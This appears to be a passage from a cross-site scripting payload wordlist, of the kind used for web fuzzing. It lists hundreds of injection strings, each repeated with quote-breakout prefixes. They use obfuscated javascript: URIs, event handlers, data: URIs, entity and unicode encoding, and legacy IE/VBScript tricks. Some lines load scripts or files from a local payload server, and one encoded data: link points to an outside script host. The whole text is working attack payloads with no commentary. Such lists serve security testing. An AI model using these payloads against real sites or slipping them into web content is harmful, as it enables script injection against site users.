  4031. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
  4032. "><iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
  4033. '><iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
  4034. <svg><script ?>alert(1)
  4035. "><svg><script ?>alert(1)
  4036. '><svg><script ?>alert(1)
  4037. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  4038. "><iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  4039. '><iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  4040. <img src=`xx:xx`onerror=alert(1)>
  4041. "><img src=`xx:xx`onerror=alert(1)>
  4042. '><img src=`xx:xx`onerror=alert(1)>
  4043. <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  4044. "><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  4045. '><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  4046. <math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">X
  4047. "><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">X
  4048. '><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">X
  4049. <math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp">X
  4050. "><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp">X
  4051. '><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp">X
  4052. <embed code="http://127.0.0.1:3555/xss_serve_payloads/X.swf" allowscriptaccess=always>
  4053. "><embed code="http://127.0.0.1:3555/xss_serve_payloads/X.swf" allowscriptaccess=always>
  4054. '><embed code="http://127.0.0.1:3555/xss_serve_payloads/X.swf" allowscriptaccess=always>
  4055. <svg contentScriptType=text/vbs><script>MsgBox+1
  4056. "><svg contentScriptType=text/vbs><script>MsgBox+1
  4057. '><svg contentScriptType=text/vbs><script>MsgBox+1
  4058. <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  4059. "><a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  4060. '><a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  4061. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  4062. "><iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  4063. '><iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  4064. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  4065. "><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  4066. '><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  4067. <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  4068. "><script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  4069. '><script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  4070. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
  4071. "><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
  4072. '><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
  4073. <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  4074. "><object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  4075. '><object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  4076. <script>+-+-1-+-+alert(1)</script>
  4077. "><script>+-+-1-+-+alert(1)</script>
  4078. '><script>+-+-1-+-+alert(1)</script>
  4079. <body/onload=&lt;!--&gt;&#10alert(1)>
  4080. "><body/onload=&lt;!--&gt;&#10alert(1)>
  4081. '><body/onload=&lt;!--&gt;&#10alert(1)>
  4082. <script allbrowserX>/*<script* */alert(1)</script
  4083. "><script allbrowserX>/*<script* */alert(1)</script
  4084. '><script allbrowserX>/*<script* */alert(1)</script
  4085. <img src ?X?\/onerror = alert(1)
  4086. "><img src ?X?\/onerror = alert(1)
  4087. '><img src ?X?\/onerror = alert(1)
  4088. <svg><script>//&NewLine;confirm(1);</script </svg>
  4089. "><svg><script>//&NewLine;confirm(1);</script </svg>
  4090. '><svg><script>//&NewLine;confirm(1);</script </svg>
  4091. <svg><script onlypossibleinopera:-)> alert(1)
  4092. "><svg><script onlypossibleinopera:-)> alert(1)
  4093. '><svg><script onlypossibleinopera:-)> alert(1)
  4094. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>X
  4095. "><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>X
  4096. '><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>X
  4097. <script x> alert(1) </script 1=2
  4098. "><script x> alert(1) </script 1=2
  4099. '><script x> alert(1) </script 1=2
  4100. <div/onmouseover='alert(1)'> style="x:">
  4101. "><div/onmouseover='alert(1)'> style="x:">
  4102. '><div/onmouseover='alert(1)'> style="x:">
  4103. <--`<img/src=` onerror=alert(1)> --!>
  4104. "><--`<img/src=` onerror=alert(1)> --!>
  4105. '><--`<img/src=` onerror=alert(1)> --!>
  4106. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  4107. "><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  4108. '><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  4109. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  4110. "><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  4111. '><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  4112. <img src=x onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');>
  4113. "><img src=x onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');>
  4114. '><img src=x onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');>
  4115. <form><button formaction=javascript&colon;alert(1)>X
  4116. "><form><button formaction=javascript&colon;alert(1)>X
  4117. '><form><button formaction=javascript&colon;alert(1)>X
  4118. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  4119. "><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  4120. '><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  4121. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">X</a>
  4122. "><a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">X</a>
  4123. '><a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">X</a>
  4124. <sVg><scRipt %00>prompt&lpar;/
  4125. "><sVg><scRipt %00>prompt&lpar;/
  4126. '><sVg><scRipt %00>prompt&lpar;/
  4127. w=window.open('invalidfileinvalidfileinvalidfile','target');setTimeout('alert(w.document.location);w.close();',1);
  4128. try%7Balert(1)%7Dcatch(e)%7Blocation.reload()%7D
  4129. <div id="alert('/X/')" style="x:expression(eval)(id)">
  4130. "><div id="alert('/X/')" style="x:expression(eval)(id)">
  4131. '><div id="alert('/X/')" style="x:expression(eval)(id)">
  4132. 0\%22))}catch(e){alert(1)}//
  4133. <img language=vbs src=<b onerror=alert#1/1#>
  4134. "><img language=vbs src=<b onerror=alert#1/1#>
  4135. '><img language=vbs src=<b onerror=alert#1/1#>
  4136. <script>alert(1)/X/'</script>
  4137. "><script>alert(1)/X/'</script>
  4138. '><script>alert(1)/X/'</script>
  4139. <script>alert(1)<!-- '</script>
  4140. "><script>alert(1)<!-- '</script>
  4141. '><script>alert(1)<!-- '</script>
  4142. <script> var a = "X"; alert(1); </script>
  4143. "><script> var a = "X"; alert(1); </script>
  4144. '><script> var a = "X"; alert(1); </script>
  4145. <script> var a=1'; alert(1); </script>
  4146. "><script> var a=1'; alert(1); </script>
  4147. '><script> var a=1'; alert(1); </script>
  4148. <script> var x = "X\"; alert(1); </script>
  4149. "><script> var x = "X\"; alert(1); </script>
  4150. '><script> var x = "X\"; alert(1); </script>
  4151. <img src="1" onerror="alert(1)">
  4152. "><img src="1" onerror="alert(1)">
  4153. '><img src="1" onerror="alert(1)">
  4154. <img src="" onload=alert(1)>
  4155. "><img src="" onload=alert(1)>
  4156. '><img src="" onload=alert(1)>
  4157. <script> function a() {} </script> <img src=1 onerror="a();alert(1)">
  4158. "><script> function a() {} </script> <img src=1 onerror="a();alert(1)">
  4159. '><script> function a() {} </script> <img src=1 onerror="a();alert(1)">
  4160. <img src=1 onerror="alert(1)">
  4161. "><img src=1 onerror="alert(1)">
  4162. '><img src=1 onerror="alert(1)">
  4163. <img src=1 onerror"alert(1)">
  4164. "><img src=1 onerror"alert(1)">
  4165. '><img src=1 onerror"alert(1)">
  4166. <svg><script>lo<sv>gChr(1)</script></svg>
  4167. "><svg><script>lo<sv>gChr(1)</script></svg>
  4168. '><svg><script>lo<sv>gChr(1)</script></svg>
  4169. <img src=# aaa;onerror="alert(1)">
  4170. "><img src=# aaa;onerror="alert(1)">
  4171. '><img src=# aaa;onerror="alert(1)">
  4172. <a href=x onerror=alert(1)>
  4173. "><a href=x onerror=alert(1)>
  4174. '><a href=x onerror=alert(1)>
  4175. <script> var x = "asdf\1 asdf"; alert(1); </script>
  4176. "><script> var x = "asdf\1 asdf"; alert(1); </script>
  4177. '><script> var x = "asdf\1 asdf"; alert(1); </script>
  4178. <img src=xx:xx;onerror=alert(1)>
  4179. "><img src=xx:xx;onerror=alert(1)>
  4180. '><img src=xx:xx;onerror=alert(1)>
  4181. <img src=x > onerror="console.alert(document.getElementsByTagName('html')[0].innerHTML)">
  4182. "><img src=x > onerror="console.alert(document.getElementsByTagName('html')[0].innerHTML)">
  4183. '><img src=x > onerror="console.alert(document.getElementsByTagName('html')[0].innerHTML)">
  4184. <script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>
  4185. "><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>
  4186. '><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>
  4187. <script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>
  4188. "><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>
  4189. '><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>
  4190. <img src=x > onerror=alert(1)>
  4191. "><img src=x > onerror=alert(1)>
  4192. '><img src=x > onerror=alert(1)>
  4193. <svg><script>alert(1)</script>
  4194. "><script>alert(1)</script>
  4195. '><script>alert(1)</script></svg>
  4196. <img src=xx:xx onerror="&#X61;lert(1);alert(1)">
  4197. "><img src=xx:xx onerror="&#X61;lert(1);alert(1)">
  4198. '><img src=xx:xx onerror="&#X61;lert(1);alert(1)">
  4199. <img src=xx:xx onerror=window[['alert']](1)>
  4200. "><img src=xx:xx onerror=window[['alert']](1)>
  4201. '><img src=xx:xx onerror=window[['alert']](1)>
  4202. "'><img src="xx:xx" on error="alert(1);">
  4203. <img src=xx:xx onerror=alert(1)>
  4204. "><img src=xx:xx onerror=alert(1)>
  4205. '><img src=xx:xx onerror=alert(1)>
  4206. <img src=xx:xx onerror =alert(1);>
  4207. "><img src=xx:xx onerror =alert(1);>
  4208. '><img src=xx:xx onerror =alert(1);>
  4209. <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(1)//">
  4210. "><META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(1)//">
  4211. '><META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(1)//">
  4212. <meta http-equiv=refresh content="javascript:alert('1')">
  4213. "><meta http-equiv=refresh content="javascript:alert('1')">
  4214. '><meta http-equiv=refresh content="javascript:alert('1')">
  4215. <a href="javascript:alert(1)">X</a>
  4216. "><a href="javascript:alert(1)">X</a>
  4217. '><a href="javascript:alert(1)">X</a>
  4218. <script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>
  4219. "><script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>
  4220. '><script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>
  4221. htmlStr = '<a href="javascript:alert(1)">X</a>
  4222. "><a href="javascript:alert(1)">X</a>
  4223. '><a href="javascript:alert(1)">X</a>'; document.getElementById('body').innerHTML = htmlStr; try { alert(1);}catch(e){alert(1);};
  4224. htmlStr = '<a href="javascript:alert(1)">X</a>
  4225. "><a href="javascript:alert(1)">X</a>
  4226. '><a href="javascript:alert(1)">X</a>'; document.getElementById('body').innerHTML = htmlStr; try { if(document.getElementById('body').firstChild.protocol === 'javascript:') { alert(1); } }catch(e){alert(1);};
  4227. <img src=x:xx onerror="try {execScript('a=1','vbs');alert(1);}catch(e){alert(1);}">
  4228. "><img src=x:xx onerror="try {execScript('a=1','vbs');alert(1);}catch(e){alert(1);}">
  4229. '><img src=x:xx onerror="try {execScript('a=1','vbs');alert(1);}catch(e){alert(1);}">
  4230. <div style="color:red'{} x:expression(alert(1))">.</div>
  4231. "><div style="color:red'{} x:expression(alert(1))">.</div>
  4232. '><div style="color:red'{} x:expression(alert(1))">.</div>
  4233. <img src='xx:x><img src=xx:x onerror=alert(1)>'>
  4234. "><img src='xx:x><img src=xx:x onerror=alert(1)>'>
  4235. '><img src='xx:x><img src=xx:x onerror=alert(1)>'>
  4236. <img src='xx:x\ onerror="alert(1)">'>
  4237. "><img src='xx:x\ onerror="alert(1)">'>
  4238. '><img src='xx:x\ onerror="alert(1)">'>
  4239. <img src='xx:x onerror="alert(1)">'>
  4240. "><img src='xx:x onerror="alert(1)">'>
  4241. '><img src='xx:x onerror="alert(1)">'>
  4242. `"'><img src="# onerror=alert(1)>
  4243. <img src=xx:xx onerror="x='\',alert(1)//'">
  4244. "><img src=xx:xx onerror="x='\',alert(1)//'">
  4245. '><img src=xx:xx onerror="x='\',alert(1)//'">
  4246. <script>alert(alert(1))</script>
  4247. "><script>alert(alert(1))</script>
  4248. '><script>alert(alert(1))</script>
  4249. <script>x='<script><img src=xx:xx onerror=alert(1)>
  4250. "><img src=xx:xx onerror=alert(1)>
  4251. '><img src=xx:xx onerror=alert(1)>';</script>
  4252. <script>alert(1)<script></script>
  4253. "><script>alert(1)<script></script>
  4254. '><script>alert(1)<script></script>
  4255. --><img src=xxx:x onerror=alert(1)> -->
  4256. <img src=xx:xx# /onerror=alert(1)>
  4257. "><img src=xx:xx# /onerror=alert(1)>
  4258. '><img src=xx:xx# /onerror=alert(1)>
  4259. <img src=xx:xx alt=`/onerror=alert(1)//`>
  4260. "><img src=xx:xx alt=`/onerror=alert(1)//`>
  4261. '><img src=xx:xx alt=`/onerror=alert(1)//`>
  4262. <img src=xx:xx onerror=alert(1)>
  4263. "><img src=xx:xx onerror=alert(1)>
  4264. '><img src=xx:xx onerror=alert(1)> <a href=javascript:alert(1)>1</a>
  4265. "><img src=xx:xx onerror=alert(1)> <a href=javascript:alert(1)>1</a>
  4266. '><img src=xx:xx onerror=alert(1)> <a href=javascript:alert(1)>1</a>
  4267. <script>alert(1,1</script//)</script>
  4268. "><script>alert(1,1</script//)</script>
  4269. '><script>alert(1,1</script//)</script>
  4270. <script>alert(1,1</script/)</script>
  4271. "><script>alert(1,1</script/)</script>
  4272. '><script>alert(1,1</script/)</script>
  4273. <body> §iframe onload=confirm(/X/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body>
  4274. "><body> §iframe onload=confirm(/X/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body>
  4275. '><body> §iframe onload=confirm(/X/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body>
  4276. <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script>
  4277. "><b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script>
  4278. '><b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script>
  4279. <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script>
  4280. "><b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script>
  4281. '><b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script>
  4282. <img src=# onerror="alert(1)" >
  4283. "><img src=# onerror="alert(1)" >
  4284. '><img src=# onerror="alert(1)" >
  4285. <title>X<script>alert(1)</script>
  4286. "><script>alert(1)</script>
  4287. '><script>alert(1)</script></title>
  4288. <div style="X:expression(alert(1))\"></div>
  4289. "><div style="X:expression(alert(1))\"></div>
  4290. '><div style="X:expression(alert(1))\"></div>
  4291. <div style="X:expression(alert(1))'"></div>
  4292. "><div style="X:expression(alert(1))'"></div>
  4293. '><div style="X:expression(alert(1))'"></div>
  4294. <div style="X:expression(alert(1))"></div>
  4295. "><div style="X:expression(alert(1))"></div>
  4296. '><div style="X:expression(alert(1))"></div>
  4297. <div style="X:expression(alert(1))">X/div>
  4298. "><div style="X:expression(alert(1))">X/div>
  4299. '><div style="X:expression(alert(1))">X/div>
  4300. <img src=1 title= x:xx/onerror=alert(1)>
  4301. "><img src=1 title= x:xx/onerror=alert(1)>
  4302. '><img src=1 title= x:xx/onerror=alert(1)>
  4303. <script>if("x\".length==2) { alert(1);}</script>
  4304. "><script>if("x\".length==2) { alert(1);}</script>
  4305. '><script>if("x\".length==2) { alert(1);}</script>
  4306. <script>if("x\".length==1) { alert(1);}</script>
  4307. "><script>if("x\".length==1) { alert(1);}</script>
  4308. '><script>if("x\".length==1) { alert(1);}</script>
  4309. <img src=xxx:xxx title=1/onerror=alert(1)>
  4310. "><img src=xxx:xxx title=1/onerror=alert(1)>
  4311. '><img src=xxx:xxx title=1/onerror=alert(1)>
  4312. <script>if("xx" == "xx") { alert(1);}</script>
  4313. "><script>if("xx" == "xx") { alert(1);}</script>
  4314. '><script>if("xx" == "xx") { alert(1);}</script>
  4315. <img src=x onError="javascript:alert(1)"/>
  4316. "><img src=x onError="javascript:alert(1)"/>
  4317. '><img src=x onError="javascript:alert(1)"/>
  4318. "`'><script>alert(1)</script>
  4319. "><script>alert(1)</script>
  4320. '><script>alert(1)</script>
  4321. <script type="text/javascript">alert(1);</script>
  4322. "><script type="text/javascript">alert(1);</script>
  4323. '><script type="text/javascript">alert(1);</script>
  4324. <script charset='utf-8'>alert(1)</script>
  4325. "><script charset='utf-8'>alert(1)</script>
  4326. '><script charset='utf-8'>alert(1)</script>
  4327. <style></style><img src="about:blank" onerror=alert(1)//></style>
  4328. "><style></style><img src="about:blank" onerror=alert(1)//></style>
  4329. '><style></style><img src="about:blank" onerror=alert(1)//></style>
  4330. <script>a='X\\';alert(1)//X';</script>
  4331. "><script>a='X\\';alert(1)//X';</script>
  4332. '><script>a='X\\';alert(1)//X';</script>
  4333. <script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>
  4334. "><script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>
  4335. '><script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>
  4336. <div class="foo1">X</div> <script>document.getElementsByClassName('foo1')[0]?alert(1):0</script>
  4337. "><div class="foo1">X</div> <script>document.getElementsByClassName('foo1')[0]?alert(1):0</script>
  4338. '><div class="foo1">X</div> <script>document.getElementsByClassName('foo1')[0]?alert(1):0</script>
  4339. "`'/><img/onload=alert(1) src=""/>
  4340. <!--<img src=xxx:x onerror=alert(1)> -->
  4341. "><!--<img src=xxx:x onerror=alert(1)> -->
  4342. '><!--<img src=xxx:x onerror=alert(1)> -->
  4343. <script>/* */alert(1)// */</script>
  4344. "><script>/* */alert(1)// */</script>
  4345. '><script>/* */alert(1)// */</script>
  4346. "'`>X<div style="font-family:'foo;x:expression(alert(1));/*';">X
  4347. "'`>X<div style="font-family:'foo'x:expression(alert(1));/*';">X
  4348. "'`><script>a=/X;;i=0;alert(1);a/i;</script>
  4349. <a href="><script>alert(1)</script>
  4350. "><script>alert(1)</script>
  4351. '><script>alert(1)</script>" />
  4352. "'`><p><svg><script>a='X;alert(1)//';</script></p>
  4353. <p><svg><script>alert(1)</script>
  4354. "><script>alert(1)</script>
  4355. '><script>alert(1)</script></p>
  4356. <iframe src="vbscript:alert()></iframe>
  4357. "><iframe src="vbscript:alert()></iframe>
  4358. '><iframe src="vbscript:alert()></iframe>
  4359. X<div style="x:expression(alert(1))">X
  4360. X<div style="xexpression(alert(1))">X
  4361. <script src="data:text/plainalert(1)"></script>
  4362. "><script src="data:text/plainalert(1)"></script>
  4363. '><script src="data:text/plainalert(1)"></script>
  4364. <script src="data:,alert(1)"></script>
  4365. "><script src="data:,alert(1)"></script>
  4366. '><script src="data:,alert(1)"></script>
  4367. <script src="data:text/plain,alert(1)"></script>
